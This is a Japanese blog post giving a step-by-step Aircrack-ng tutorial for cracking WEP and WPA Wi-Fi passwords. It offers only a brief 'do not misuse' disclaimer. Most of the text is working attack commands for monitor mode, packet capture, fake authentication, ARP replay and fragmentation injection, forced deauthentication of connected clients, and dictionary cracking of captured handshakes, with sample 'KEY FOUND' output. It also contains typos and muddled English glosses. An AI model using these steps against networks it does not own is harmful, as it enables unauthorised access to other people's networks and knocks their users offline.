無線LANは超危険!?Aircrack-ngで検証と使い方まとめ
以前に「無線LANのWPA/WPA2-PSKをGPUで超高速解析してパスワードを見つけるフリーのオープンソースソフト「Pyrit」」なる記事を読んで、いつか検証してみようと思ってたので、実際にaircrack-ngを使ってみました。
私が検証した環境ではなんとWEPとWPA両方、解析できてしまった。
無線LANのセキュリティを検証するために行っています。悪用はしないで下さいね。 英語は苦手なので、ニュアンスで適当に書いてますのであしからず。。。
WEP解析とWPA解析で共通の手順
(Common steps WEP and WPA)
WEPとWPAのパスワード解析はAircrack-ngのLinux版を使います。私はubuntuでAircrack-ngを使いました。
Aircrack-ngのubuntuへのインストールはアプリケーションマネージャ > Aircrack-ngを検索 > インストール
環境構築の手順はもし要望があれば書きたいと思います。
インターフェースにモニターモードを追加
(add interface monitor mode)
新しいターミナルを立ち上げる毎に、管理者権限を設定して下さい。
ターミナルを立ち上げて(Terminal 1)次のコマンドを実行します。
# Start another console session and enter # change authority to Administrator sudo -i su - # disable network adapter airmon-ng stop wlan0 # add monitor mode network adapter airmon-ng start wlan0 # check signal around you # stop dump after you choiced target "CTRL + C" airodunmp-ng mon0airodump-ng で周囲の無線LANを確認して、解析するターゲットを選びます。
パスワード解析に必要なパケットを収集
(Collect the required packets for crack password)
# Start another console session and enter # start capture packet airodump-ng -c (channel No) --bssid (BSSID) -w (capture file name) mon0パケットデータの増加が充分なら、以下の手順は必要ないので解析の手順へ進む。もし充分なパケットデータが集まらない場合は、パケットインジェクションをして下さい。
If the packet gets traction if sufficient data, please use the packet injection.
アクセスポイントに認証要求する
(Authentication requests to the access point)
# Start another console session and enter # Fake authentication aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (your MAC adress) mon0 # exsample output of got Authentication Waitig for beacon frame (BSSID: 00:11:22:33:44:55) Sending Authentication Request Authentication successful Sending Association Request Association successful :-)このようなメッセージが出たら認証要求に成功です。
WPAパスワード解析の場合(when encryption is wpa)
ここでクライアントの再認証が発生すればハンドシェイクデータを取得できます。 パケット収集中のターミナルの右上に[WPA handshake: 00:11:22:33:44:55]こんなメッセージが出ているはずです。
# example output of handshake data CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:11:22:33:44:55 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:11:22:33:44:55 39 100 51 116 14 9 54 WPA2 CCMP PSK sample
WEPのパケットインジェクション(Packet Injection for WEP)
パケットデータの増加が遅い場合は、パケットインジェクションで強制的にパケットデータを増やすことができます。パケットインジェクションは2通りの方法があります。
You can increase the data packet in the packet injection force.
正規のクライアントがARPしている場合
(When the client is connected)
# Use Terminal 3 aireplay-ng -3 -b (BSSID) -h (sauce MAC adress) mon0
正規のクライアントがARPしていない場合
(When the client is not connected)
# Use Terminal 3 # Fragmentation Attack aireplay-ng -5 -b (BSSID) -h (souce MAC adress) mon0 # Make ARP Request packetforge-ng -0 -a (BSSID) -h (souce MAC adress) -k (target ip adress) -l (souce ip adress) -y (xor file name) -w (save file name) # Generate traffic aireplay-ng -2 -r (save file name) mon0
WAPの強制認証解除
(Forced release of WAP authentication)
クライアントの接続を強制的に切らせて無理やり再接続させてやるのがこのやり方
さらに再接続中に、ESSIDやキーストリーム(keystream)も検知できるかもしれないおまけ付き
# Typical Deauthentication aireplay-ng --deauth 5 -a (BSSID) -c (MAC address of the client you are deauthing) rausb0 # exsample aireplay-ng --deauth 5 -a 00:01:02:03:04:05 -c 00:04:05:06:07:08 mon0
上手くいかない場合は、無線LANチップのメーカーを確認しましょう。
無線LANのチップがAtherosでない方はUSBタイプのを使用したほうが、すんなり上手くいきますよ。
WEPのパスワード解析(Analysis of the WEP password)
新しいターミナル(Terminal 4)を立ち上げ、次のコマンドを実行。# Start another console session and enter aircrack-ng (capture file name).cap
WAPのパスワード解析(Analysis of the WAP password)
新しいターミナル(Terminal 4)を立ち上げ、次のコマンドを実行。WAPの場合は辞書ファイルによるブルートフォースアタックを行いますので、辞書ファイルの精度が大事です。 airodumpの画面でハンドシェイクデータが取得できていないと、解析できません。
# Start another console session and enter aircrack-ng -w (password list) (capture file name).cap # exsample aircrack-ng -w dictionary.txt sample.cap
パスワード解析結果(Results of the analysis Password)
WAP、WEPのパスワードの解析が終了すると次のようにKEY FOUNDと表示されます。Aircrack-ng 1.0 [00:00:00] 2 keys tested (37.20 k/s) KEY FOUND! [ 12345678 ] Master Key : CD 69 0D 11 8E AC AA B8 A6 13 C5 4A 72 82 Transcient Key : 06 F8 BB F3 B1 55 AE CE 8A 9D A0 FC ED A6 FF 1D 41 E1 65 17 93 2B 20 90 8C EA 32 15 EAPOL HMAC : 4E 27 D9 5B 00 91 53参考サイト : Main [Aircrack-ng]
使用は自己責任でお願いします。
Please use at your own risk
aircrackの動作環境がintelの場合の方はこちら
無線LANのチップがAtherosでない方から、うまくいかないという質問が多いので追記しておきます。解決方法としては、パッチを当てるかUSB無線LANアダプタを買ってしまうかのどちらかになると思います。
パッチは知識を持っている方でしたらできると思いますが、てっとりばやくUSB無線LANアダプタを買ってしまうのが安全で確実でいいと思います。
パッチあてに失敗して自分のアクセスポイントにも繋がらなくなってしまっては、もともこもありませんからね。
一応Atherosチップ搭載の無線LANアダプタを調べておきました。
- 関連記事
-
-
無線LANは超危険!?Aircrack-ngで検証と使い方まとめ
-
体験版プログラムの期間延長方法
-
無料ウィルス対策フリーソフトランキングTOP3
-